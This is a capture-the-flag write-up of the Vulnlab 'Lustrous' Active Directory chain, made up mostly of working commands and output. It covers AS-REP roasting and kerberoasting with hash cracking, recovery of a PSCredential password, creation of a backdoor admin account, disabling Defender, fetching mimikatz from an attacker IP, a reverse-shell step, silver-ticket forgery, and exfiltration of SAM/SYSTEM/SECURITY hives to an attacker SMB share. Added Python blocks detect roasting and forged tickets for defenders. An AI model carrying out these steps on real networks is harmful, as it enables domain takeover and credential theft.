vulnlab lustrous
Lustrous is a medium-difficulty AD chain made up of two machines, LusMS and LusDC. Enumerating the FTP share on LusMS gives a list of usernames, one of which, ben.cox, does not require Kerberos pre-authentication, so the account can be AS-REP roasted. With remote access to LusMS as ben.cox, the local Administrator password turns up as a PowerShell secure string that can be converted back to plaintext, which gives the SYSTEM account on LusMS. The web application on LusDC requires Kerberos authentication; since there is a service account with an SPN, kerberoasting cracks svc_web's hash, and a silver ticket forged as tony.ward, a member of the Backup Operators group, lets us retrieve his password from the site. With impacket-reg we back up the SAM, SYSTEM and SECURITY hives, and dumping the NTDS.dit with the LusDC machine account hash gets domain admin.
Writeup:
Enumerating the anonymous FTP share finds 3 users.
After this we check which of them are AS-REP roastable (no pre-authentication required) and then look for kerberoastable accounts.
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'
Crack the hashes with hashcat.
The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200, and for Kerberos 5, etype 23, TGS-REP hashes it is 13100.
You can find both within the hashcat example hashes page.
hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt
Run a BloodHound collection to find high-value targets:
bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp
$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName    Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc              svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619
http/lusdc.lustrous.vl  svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$e898fd0c2e9ea4fed53d9537a90e5c4daf043e597802909d35109f8891bc25e5a6aaaa6e2739e485425b244c3735913ff0f4426ce73c6021df92c557f4ab1eb6c481a657d26b801e18cc6af1cc789316f2045fc77e2cbaaf97aa6ae1fb7f26a0310bb149f06c2a65c3ba2315b3178d17669c8eb7a5c571f2bfaf5d0673dff09564526c9308ecc38663419cc55cc7f30ed1c7e8507f6b328284cfbf8911e9fcbfb57b4ccf0c5718e370450ab04b8c6e32fc9339fa3a3a9b349f9b6331d49a3bf080d8d1f94982d4aa87ec49de95d6efb283a196124c1b8cdd1a44c9b1201cf213a07dfb5ce2cda72465368796a991a4e25ed2165e9af342f39a06dd7acf1bcd8146036d64f8913c63c13c7c2ec8e15e3bcc364fc0a15bd8caef7ea023461fa8ddd6f734d2e5f5aa6ed2a544c09b05d653896e7a4c44d27ffba095be6aceec903378b6fc6ca41fc485fcaf5f041682a8c2a7510e23b827a542464e68002dee9cd17a5d09ca3f6b8a9d69fd34fcaa0eb35d36db5f47b9af13f8bac9ca2fe84eabb5858f8ba85864eed9b407c53426bbcde4742a66ac734365d4d72faa8d68e6db348b5e70c5abc6278dc474ab8d91fa45fc38447b470f3f5b480a3c27c34ffac8aff5e7cbed4dcb5ac4529cf42b0f3142d053879891bc224acece35f25164c38a9b2ab058bae92c0498051259c4cba97214aff005d8adba5a073be1cab0dc832abae307b04694c049bd52cf774829d4ae48c79abd188e373fb6108c351f12969e5badc2da61e0c0a0a063dbc637e08473d332fcccd8a3bbb45d5360bd2c11861fe94a290e357c18be4c2c0f849843f3e93ba81a34a1eca0661a7b24e7f3cb459cbd73a243d49b9357c70efcddabe13afa1d9778033681129046a8034b1dd26217dae4bde336b5871961623f2156515325888499f3a6cda70985981550d147f61f028040c9f6a6c78a8b9c406ca1b7d47ac14a25db13c48db0726f215c650723fd267dd9b832fda6700fc964c0df83369c4d21e475d69ac907d072b561aa6011a5bcca92d93ee834bee6619b3461bd9db8371cc6872b4adacadd07119dd3128073c03c110e1878f7d35e51eff75e15b774e5d0e7c775b94bf2a8c3dbac3ab7fa3f38670ed3b486f9c5a7245afa95550a43bd8dbd3d8923f18565a3899294dea285cc7f8e653a493283449cad01be0862053c1121563d7ebfb4e63e896e19d1216e31dde60e04e1b6ea383b7c6c8534c97c6ff9ebe5e0e5839cc0c267cebd21461b847c07285c6d99fe14b6d35b22b96f4242acd5d0668a1431d14a582b0a19a35bd657f29b230173fb9bf0a76ed88aff79947ebdc45ff4067c5aa96ccb37f
f9633b9a77b4f241f8961334cbaec36007670f0e695a76c735a2cb4106ef6e2de129c964e8353b37db9d9cad57a0998979539ea8435ee2ed4ca05fbb7472e46a212a096f0bf75
hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt
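The detection side of the two roasting steps above, as an added example that is not part of the original writeup: the GetNPUsers request leaves a 4768 (Kerberos TGT requested) on the DC with Pre-Authentication Type 0 for ben.cox, and the GetUserSPNs request leaves a 4769 (service ticket requested) asking for an RC4 ticket (encryption type 0x17) to svc_web's SPN. The event lines are constructed samples with the Windows event fields flattened to key=value pairs (an assumption about how a SIEM exports them), and the Python is mine, not impacket's.

```python
"""Flag AS-REP roasting (4768, pre-auth type 0) and kerberoasting (4769, RC4
ticket for a user account's SPN) in DC security events. Added example; the
event lines are constructed samples, not real log data from the page."""

# Constructed samples: one event per line, event XML fields flattened to key=value.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=ben.cox ServiceName=krbtgt PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.8.2.138",
    "EventID=4768 TargetUserName=rachel.parker ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.187.10",
    "EventID=4769 TargetUserName=ben.cox@LUSTROUS.VL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.8.2.138",
    "EventID=4769 TargetUserName=ben.cox@LUSTROUS.VL ServiceName=LUSDC$ TicketEncryptionType=0x12 IpAddress=10.8.2.138",
    "EventID=4769 TargetUserName=tony.ward@LUSTROUS.VL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.187.20",
]


def parse_event(line):
    """Space-separated key=value pairs -> dict."""
    return dict(field.split("=", 1) for field in line.split())


def classify(ev):
    """Return the roasting technique an event is consistent with, or None."""
    eid = ev.get("EventID")
    etype = ev.get("TicketEncryptionType", "").lower()
    if eid == "4768" and ev.get("PreAuthType") == "0":
        # TGT handed out without pre-auth: the account has DONT_REQ_PREAUTH set
        # and the AS-REP can be cracked offline (hashcat mode 18200 above).
        return "as-rep-roast"
    if eid == "4769" and etype == "0x17":
        svc = ev.get("ServiceName", "")
        # Computer accounts ($) and krbtgt are excluded; an RC4 ticket for a
        # user account's SPN is the kerberoast signature (hashcat mode 13100).
        if not svc.endswith("$") and svc.lower() != "krbtgt":
            return "kerberoast"
    return None


def roasting_alerts(lines):
    """(technique, requesting account, service, source IP) for every hit."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        kind = classify(ev)
        if kind:
            alerts.append((kind, ev["TargetUserName"], ev["ServiceName"], ev["IpAddress"]))
    return alerts


if __name__ == "__main__":
    for alert in roasting_alerts(SAMPLE_EVENTS):
        print(*alert)
```

Run it and the two alerts print; the rachel.parker TGT (pre-auth type 2) and the LUSDC$ ticket pass because that is what normal Kerberos traffic looks like. The fix for the first finding is clearing "Do not require Kerberos preauthentication" on the account; for the second, a long random password or a gMSA for svc_web, so the 13100 hash does not crack.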
WinRM to lusms.lustrous.vl:
evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'
On Ben's Desktop we find an XML representation of a PSCredential object in a file named admin.xml.
Following this blog post, we can extract the cleartext password from the file:
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<T>System.Management.Automation.PSCredential</T>
<ToString>System.Management.Automation.PSCredential</ToString>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List
Password : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
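What the ConvertTo-SecureString round trip above relies on, as an added example that is not part of the original writeup: a secure string exported without -Key is a DPAPI blob, and its header names the master key that can unwrap it. The parser below walks that header for the exact <SS> value from admin.xml. It decrypts nothing (the master key is only available in the profile of the user who created the blob, which is why the conversion works from that account's session), and the field names follow the common open-source DPAPI parsers rather than an official Microsoft API.

```python
"""Walk the header of the DPAPI blob that ConvertFrom-SecureString wrote into
admin.xml above. Added example, not code from the page; it reads the documented
blob layout only and cannot decrypt anything. Field names are the ones the
usual open-source DPAPI parsers use (an assumption, not a Microsoft API)."""
import struct
import uuid

# The <SS> value from admin.xml on this page, split at field boundaries for readability.
BLOB_HEX = (
    "01000000d08c9ddf0115d1118c7a00c04fc297eb"
    "01000000d4ecf9dfb12aed4eab72b909047c4e56"
    "0000000002000000000003660000c000000010000000"
    "d5ad4244981a04676e2b522e24a5e800"
    "0000000004800000a000000010000000"
    "72cd97a471d9d6379c6d8563145c9c0e"
    "48000000"
    "f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3c"
    "c87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f"
    "85c131798cb77da9"
    "14000000e43aa04d2437278439a9f7f4b812ad3776345367"
)

# CryptoAPI ALG_ID values commonly found in DPAPI blobs.
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


def parse_dpapi_blob(raw):
    """Return the blob's metadata; every length-prefixed field is consumed in order."""
    off = 0

    def u32():
        nonlocal off
        (value,) = struct.unpack_from("<I", raw, off)
        off += 4
        return value

    def take(n):
        nonlocal off
        chunk = raw[off:off + n]
        off += n
        return chunk

    info = {"version": u32()}
    info["provider_guid"] = str(uuid.UUID(bytes_le=take(16)))   # DPAPI provider
    info["masterkey_version"] = u32()
    info["masterkey_guid"] = str(uuid.UUID(bytes_le=take(16)))  # master key that unwraps this blob
    info["flags"] = u32()
    info["description"] = take(u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt = u32()
    info["alg_crypt"] = ALG_NAMES.get(alg_crypt, hex(alg_crypt))
    info["alg_crypt_bits"] = u32()
    info["salt"] = take(u32()).hex()
    info["hmac_key"] = take(u32()).hex()          # empty in modern blobs
    alg_hash = u32()
    info["alg_hash"] = ALG_NAMES.get(alg_hash, hex(alg_hash))
    info["alg_hash_bits"] = u32()
    info["hmac2_key"] = take(u32()).hex()
    info["ciphertext"] = take(u32()).hex()        # the wrapped secure string
    info["signature"] = take(u32()).hex()         # HMAC over the blob
    info["consumed"] = off                        # should equal len(raw)
    return info


if __name__ == "__main__":
    for key, value in parse_dpapi_blob(bytes.fromhex(BLOB_HEX)).items():
        print(f"{key:18} {value}")
```

The masterkey_guid names the file under %APPDATA%\Microsoft\Protect\<SID>\ that unwraps the blob, so the protection is only as strong as access to that user profile; for an admin password that has to live on disk, Export-Clixml is a convenience, not a secret store.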
Log on as Administrator and make ben.cox a local admin:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.
Look around:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ xfreerdp /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx
Start Edge, log in to https://lusdc.lustrous.vl as ben.cox and find the secure note.
We also have the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
We disable Windows Defender and upload mimikatz in our current PowerShell session, where we can store a new ticket for the administrator account:
set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe
Then we use mkpsrevshell.py:
python3 mkpsrevshell.py 10.8.2.138 443
└─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e <base64-encoded command omitted>"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[!] This will work ONLY on Windows >= Vista
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
All in one:
PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit"
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Target : lusdc.lustrous.vl
Lifetime : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
-> Ticket : ** Pass The Ticket **
* EncTicketPart generated
* EncTicketPart encrypted
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
Current LogonId is 0:0x3e7
#0> Client: tony.ward @ lustrous.vl
Server: http/lusdc.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 9/21/2024 18:04:01 (local)
End Time: 9/19/2034 18:04:01 (local)
Renew Time: 9/19/2034 18:04:01 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
First we need the NTLM hash of the service account (svc_web):
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717
The following wmic command can be used to get the SID of tony.ward (or we use BloodHound for this):
C:\Windows\system32>wmic useraccount where name='tony.ward' get sid
SID S-1-5-21-2355092754-1584501958-1513963426-1114
We then use the NTLM hash in the /rc4 parameter:
kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /ptt
and request our target website:
iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
This gives us u
We had better not use the Administrator account for this, meaning we need another target; in our case we craft a silver ticket for tony.ward:
kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
In an administrative cmd prompt:
C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user "lustrous\ben.cox" ...
Then, in mimikatz:
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Target : LusDC.lustrous.vl
Lifetime : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
-> Ticket : ** Pass The Ticket **
* EncTicketPart generated
* EncTicketPart encrypted
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
c:\temp>klist
Current LogonId is 0:0x4900d
#0> Client: tony.ward @ lustrous.vl
Server: http/LusDC.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 7/27/2024 19:28:18 (local)
End Time: 7/25/2034 19:28:18 (local)
Renew Time: 7/25/2034 19:28:18 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<a class="btn btn-danger" href="/Internal
<input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
<p>© 2024 - SNotes</p>
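Two checks a defender can run against what is shown above, as an added example that is not part of the original writeup. The forged ticket carries a ten-year lifetime and RC4 encryption, neither of which a KDC hands out under default policy, and because it was built offline the DC never logged a 4769 for it, while the web server still logged a Kerberos logon. The klist text copies the layout of the klist output above; the 4769/4624 records are constructed samples with simplified field names (an assumption, real events carry more), and the 10-hour default is the domain Kerberos policy value.

```python
"""Defender-side checks for a forged service ticket like the one above. Added
example, not code from the page; the klist text and the events are constructed
samples copying the layout shown on this page, and nothing here contacts a DC."""
from datetime import datetime, timedelta

# Constructed klist output: ticket #0 mirrors the forged http/lusdc ticket above,
# ticket #1 is what a KDC-issued ticket under default policy looks like.
KLIST_SAMPLE = """\
#0> Client: tony.ward @ lustrous.vl
Server: http/lusdc.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 9/21/2024 18:04:01 (local)
End Time: 9/19/2034 18:04:01 (local)
Renew Time: 9/19/2034 18:04:01 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
#1> Client: tony.ward @ lustrous.vl
Server: cifs/lusms.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 9/21/2024 18:00:00 (local)
End Time: 9/22/2024 04:00:00 (local)
Renew Time: 9/28/2024 18:00:00 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
"""

MAX_SERVICE_TICKET_AGE = timedelta(hours=10)  # default "Maximum lifetime for service ticket"


def _ts(text):
    return datetime.strptime(text.replace(" (local)", ""), "%m/%d/%Y %H:%M:%S")


def parse_klist(text):
    """One dict per cached ticket, keyed by the klist field names."""
    tickets, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#") and "> Client: " in line:
            cur = {"Client": line.split("Client: ", 1)[1]}
            tickets.append(cur)
        elif cur is not None and ": " in line:
            key, _, value = line.partition(": ")
            cur[key] = value
    return tickets


def suspicious_tickets(tickets, max_age=MAX_SERVICE_TICKET_AGE):
    """The KDC caps ticket life at the domain policy and, in an AES-capable
    domain, does not hand a user an RC4 service ticket; a ticket forged with
    the service account's RC4 key (as above) can show both."""
    findings = []
    for t in tickets:
        reasons = []
        life = _ts(t["End Time"]) - _ts(t["Start Time"])
        if life > max_age:
            reasons.append("lifetime of %d days exceeds policy" % life.days)
        if "RC4" in t["KerbTicket Encryption Type"]:
            reasons.append("RC4 service ticket")
        if reasons:
            findings.append((t["Server"], reasons))
    return findings


# Constructed events. The DC logs 4769 for every service ticket it issues; the
# host logs 4624 (logon type 3, Kerberos) when a ticket is presented to it.
DC_4769 = [
    {"account": "ben.cox", "service": "http/lusdc.lustrous.vl", "time": "9/21/2024 17:55:10"},
    {"account": "tony.ward", "service": "cifs/lusms.lustrous.vl", "time": "9/21/2024 18:00:00"},
]
HOST_4624 = [
    {"account": "ben.cox", "host": "lusdc", "package": "Kerberos", "time": "9/21/2024 17:55:12"},
    {"account": "tony.ward", "host": "lusdc", "package": "Kerberos", "time": "9/21/2024 18:04:30"},
    {"account": "tony.ward", "host": "lusdc", "package": "NTLM", "time": "9/21/2024 18:10:00"},
]


def logons_without_tgs(logons, tgs_events, window=MAX_SERVICE_TICKET_AGE):
    """Kerberos logons on a host that no DC-issued service ticket for that host
    explains. A silver ticket is built offline, so the DC never logs a 4769."""
    unexplained = []
    for lg in logons:
        if lg["package"] != "Kerberos":
            continue  # NTLM logons need a different correlation
        when = _ts(lg["time"])
        explained = any(
            r["account"].lower() == lg["account"].lower()
            and r["service"].split("/", 1)[1].split(".", 1)[0].lower() == lg["host"].lower()
            and timedelta(0) <= when - _ts(r["time"]) <= window
            for r in tgs_events)
        if not explained:
            unexplained.append((lg["account"], lg["host"], lg["time"]))
    return unexplained


if __name__ == "__main__":
    for server, reasons in suspicious_tickets(parse_klist(KLIST_SAMPLE)):
        print(server, "->", "; ".join(reasons))
    for item in logons_without_tgs(HOST_4624, DC_4769):
        print("no matching 4769 for", item)
```

The lifetime check works on any host where klist can be collected; the 4769/4624 correlation needs both the DC and the service host forwarding to the same place, and it is the one that still fires when the forger picks a sane lifetime and an AES key. Rotating svc_web's password twice after the incident invalidates every ticket forged with the old key.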
PRIVESC
Logged in as Ben, right-click PowerShell and run it as user tony.ward:
PS C:\Users\ben.cox> whoami
PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl
[*] Identity: LocalService
\_ Registry Rights: -2147483648
[*] Identity: LocalService
\_ Registry Rights: ReadKey
[*] Identity: BUILTIN\Administrators
\_ Registry Rights: 268435456
[*] Identity: BUILTIN\Administrators
\_ Registry Rights: FullControl
[*] Identity: BUILTIN\Backup Operators
\_ Registry Rights: ReadKey
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
drw-rw-rw- 0 Sat Jul 27 13:51:14 2024 .
drw-rw-rw- 0 Sat May 27 20:32:06 2023 ..
-rw-rw-rw- 45056 Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw- 28672 Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw- 16965632 Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw- 6 Sat Jul 27 11:50:13 2024 SA.DAT
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
Or do it this way:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe…
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save
